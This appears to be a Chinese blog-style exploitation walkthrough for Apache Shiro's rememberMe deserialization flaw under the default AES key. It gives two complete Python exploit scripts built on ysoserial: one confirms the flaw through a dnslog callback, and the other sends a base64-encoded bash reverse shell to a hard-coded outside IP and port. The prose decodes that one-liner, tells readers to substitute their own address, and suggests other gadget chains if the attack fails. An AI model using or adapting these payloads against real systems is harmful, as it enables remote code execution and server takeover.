开始干
第一个 POC 主要用于测试目的，可以通过 dnslog 来进行验证。

#!/usr/bin/env python3
# coding=utf-8
import sys
import uuid
import base64
import subprocess
import requests
import random
from Crypto.Cipher import AES


# Gadget chain(s) handed to ysoserial; attack() walks this list in order.
# Alternatives the author experimented with, kept for reference:
#   ["URLDNS"], ["CommonsBeanutils1"], ["CommonsCollections2"]
EXP_CLASS = ["JRMPClient"]

# AES block length in bytes; the padding helper below rounds payloads up to
# a multiple of it.
BLOCK_SIZE = AES.block_size


def PAD_FUNC(s):
    """Return *s* padded PKCS#7-style to a multiple of BLOCK_SIZE.

    Args:
        s: payload bytes (in attack() this is ysoserial's serialized object).

    Returns:
        bytes: *s* followed by 1..BLOCK_SIZE pad bytes, each holding the pad
        length, so an already aligned input still grows by one full block.
    """
    pad_len = BLOCK_SIZE - len(s) % BLOCK_SIZE
    return s + bytes([pad_len]) * pad_len


# Base64 form of the AES key this script assumes the target still uses for
# its rememberMe cookie - the widely known default key shipped with Apache
# Shiro. Defender note: a deployment that still decrypts cookies under this
# value should rotate to a freshly generated per-installation key (and
# upgrade Shiro); cookies encrypted under the old key then no longer decrypt.
SHIRO_KEY = "kPH+bIxk5D2deZiIxcaaaA=="
# CBC mode with a random 16-byte IV drawn once per process run; attack()
# prepends AES_IV to the ciphertext before base64-encoding it.
AES_MODE = AES.MODE_CBC
AES_IV = uuid.uuid4().bytes


def attack(target: str) -> None:
    """Send a rememberMe cookie built from a ysoserial payload to *target*.

    For each gadget class in EXP_CLASS the function:
      1. builds a random 5-letter subdomain under the author's dnslog domain
         (hard-coded below) so a DNS lookup by the target can be observed
         out of band;
      2. runs the local ysoserial jar with that class and hostname, reading
         the serialized object from the child's stdout;
      3. pads it with PAD_FUNC, encrypts it AES-CBC under SHIRO_KEY with
         AES_IV, prefixes the IV and base64-encodes the result;
      4. sends that string as the ``rememberMe`` cookie in a GET to *target*.

    Args:
        target: URL passed straight to requests.get (argv[1] in __main__).

    Returns:
        None. Progress is printed; the HTTP response is never inspected, so
        "success" only means the request went out - the dnslog must be
        checked separately.

    Defender note: the cookie is only meaningful to a server that still
    decrypts rememberMe under the key in SHIRO_KEY; rotating that key is the
    fix, and a rememberMe cookie whose plaintext is a Java serialized object
    is the thing to alert on.
    """
    for _exp_class in EXP_CLASS:
        print("[*] Try to use {} payload...".format(_exp_class))
        # 5 distinct lowercase letters + the author's dnslog zone; random (not
        # secrets) is fine here, the label only needs to be unique-ish.
        command = ''.join(random.sample(['z','y','x','w','v','u','t','s','r','q','p','o','n','m','l','k','j','i','h','g','f','e','d','c','b','a'], 5)) + '.xo21jn.ceye.io'
        print("[*] Try to use dnslog: {}".format(command))
        # ysoserial jar is expected in the current working directory.
        # NOTE(review): the child is never waited on or closed; its stdout is
        # read once below and the handle is left to the GC.
        popen = subprocess.Popen(["java", "-jar", "ysoserial-0.0.6-SNAPSHOT-all.jar", _exp_class,command],stdout=subprocess.PIPE)
  
        encryptor = AES.new(base64.b64decode(SHIRO_KEY), AES_MODE, AES_IV)
        # read() blocks until ysoserial exits and returns the whole object.
        file_body = PAD_FUNC(popen.stdout.read())
        # Cookie layout: IV || AES-CBC(ciphertext), then base64.
        base64_ciphertext = base64.b64encode(AES_IV + encryptor.encrypt(file_body))
        #print("[*] base64_ciphertext: {}".format(base64_ciphertext))
        print("[*] base64_decodeTXT: rememberMe={}".format(base64_ciphertext.decode()))
        try:
            # response is assigned but never used; status/body are ignored.
            response = requests.get(target, timeout=20, cookies={"rememberMe": base64_ciphertext.decode()})
            print ('[*] Request to target URL success!')
        except Exception as e:
            # Any request error (timeout, connection refused, bad URL) ends
            # the whole loop, not just this gadget class.
            print("[x] Request to target URL fail! {}".format(e))
            break

if __name__ == '__main__':
    # Usage: <script> <target-url>; a missing argument raises IndexError.
    attack(sys.argv[1])

这个主要是探测目标是否存在该漏洞
1.jpg

把对应的COOKIE复制到burp里面再次发包
2.jpg

既然已经确认了那么就直接开打了
第二个POC

#!/usr/bin/env python3
# coding=utf-8
import sys
import uuid
import base64
import subprocess
import requests
import random
from Crypto.Cipher import AES


# Gadget chain(s) handed to ysoserial; attack() walks this list in order.
# Alternatives the author experimented with, kept for reference:
#   ["URLDNS"], ["CommonsBeanutils1"], ["JRMPClient"]
EXP_CLASS = ["CommonsCollections2"]

# AES block length in bytes; the padding helper below rounds payloads up to
# a multiple of it.
BLOCK_SIZE = AES.block_size


def PAD_FUNC(s):
    """Return *s* padded PKCS#7-style to a multiple of BLOCK_SIZE.

    Args:
        s: payload bytes (in attack() this is ysoserial's serialized object).

    Returns:
        bytes: *s* followed by 1..BLOCK_SIZE pad bytes, each holding the pad
        length, so an already aligned input still grows by one full block.
    """
    pad_len = BLOCK_SIZE - len(s) % BLOCK_SIZE
    return s + bytes([pad_len]) * pad_len


# Base64 form of the AES key this script assumes the target still uses for
# its rememberMe cookie - the widely known default key shipped with Apache
# Shiro. Defender note: a deployment that still decrypts cookies under this
# value should rotate to a freshly generated per-installation key (and
# upgrade Shiro); cookies encrypted under the old key then no longer decrypt.
SHIRO_KEY = "kPH+bIxk5D2deZiIxcaaaA=="
# CBC mode with a random 16-byte IV drawn once per process run; attack()
# prepends AES_IV to the ciphertext before base64-encoding it.
AES_MODE = AES.MODE_CBC
AES_IV = uuid.uuid4().bytes


def attack(target: str) -> None:
    """Send a rememberMe cookie built from a ysoserial payload to *target*.

    For each gadget class in EXP_CLASS the function:
      1. runs the local ysoserial jar with that class and the fixed command
         string below, reading the serialized object from the child's stdout;
      2. pads it with PAD_FUNC, encrypts it AES-CBC under SHIRO_KEY with
         AES_IV, prefixes the IV and base64-encodes the result;
      3. sends that string as the ``rememberMe`` cookie in a GET to *target*.

    Args:
        target: URL passed straight to requests.get (argv[1] in __main__).

    Returns:
        None. Progress is printed; the HTTP response is never inspected, so
        "success" only means the request went out.

    Defender note: the cookie is only meaningful to a server that still
    decrypts rememberMe under the key in SHIRO_KEY; rotating that key is the
    fix. On the host, the observable is a java process spawning bash followed
    by an unexpected outbound TCP connection from the application server.
    """
    for _exp_class in EXP_CLASS:
        print("[*] Try to use {} payload...".format(_exp_class))
        # Command the gadget chain runs on the target. The base64 blob decodes
        # to the bash reverse-shell one-liner quoted in the prose after this
        # script; the author's listener address is embedded in that blob.
        command = "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMzkuMTU1LjIuMTAxLzEyMzUgMD4mMQ==}|{base64,-d}|{bash,-i}"
        # ysoserial jar is expected in the current working directory.
        # NOTE(review): the child is never waited on or closed; its stdout is
        # read once below and the handle is left to the GC.
        popen = subprocess.Popen(["java", "-jar", "ysoserial-0.0.6-SNAPSHOT-all.jar", _exp_class,command],stdout=subprocess.PIPE)
  
        encryptor = AES.new(base64.b64decode(SHIRO_KEY), AES_MODE, AES_IV)
        # read() blocks until ysoserial exits and returns the whole object.
        file_body = PAD_FUNC(popen.stdout.read())
        # Cookie layout: IV || AES-CBC(ciphertext), then base64.
        base64_ciphertext = base64.b64encode(AES_IV + encryptor.encrypt(file_body))
        #print("[*] base64_ciphertext: {}".format(base64_ciphertext))
        print("[*] base64_decodeTXT: rememberMe={}".format(base64_ciphertext.decode()))
        try:
            # response is assigned but never used; status/body are ignored.
            response = requests.get(target, timeout=20, cookies={"rememberMe": base64_ciphertext.decode()})
            print ('[*] Request to target URL success!')
        except Exception as e:
            # Any request error (timeout, connection refused, bad URL) ends
            # the whole loop, not just this gadget class.
            print("[x] Request to target URL fail! {}".format(e))
            break

if __name__ == '__main__':
    # Usage: <script> <target-url>; a missing argument raises IndexError.
    attack(sys.argv[1])

command = "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMzkuMTU1LjIuMTAxLzEyMzUgMD4mMQ==}|{base64,-d}|{bash,-i}" 其中 echo 后面的是 PAYLOAD，它是经过 BASE64 编码的。本章中就是 YmFzaCAtaSA+JiAvZGV2L3RjcC8xMzkuMTU1LjIuMTAxLzEyMzUgMD4mMQ== 这一段，解码出来就是 bash -i >& /dev/tcp/139.155.2.101/1235 0>&1，根据自己的需要修改即可。

另外，PAYLOAD 有时会卡住或由于其他原因导致反弹不成功，多尝试几次即可。
3.jpg

如果在实战情况中,CommonsCollections2不行的话,也可以试试CommonsBeanutils1
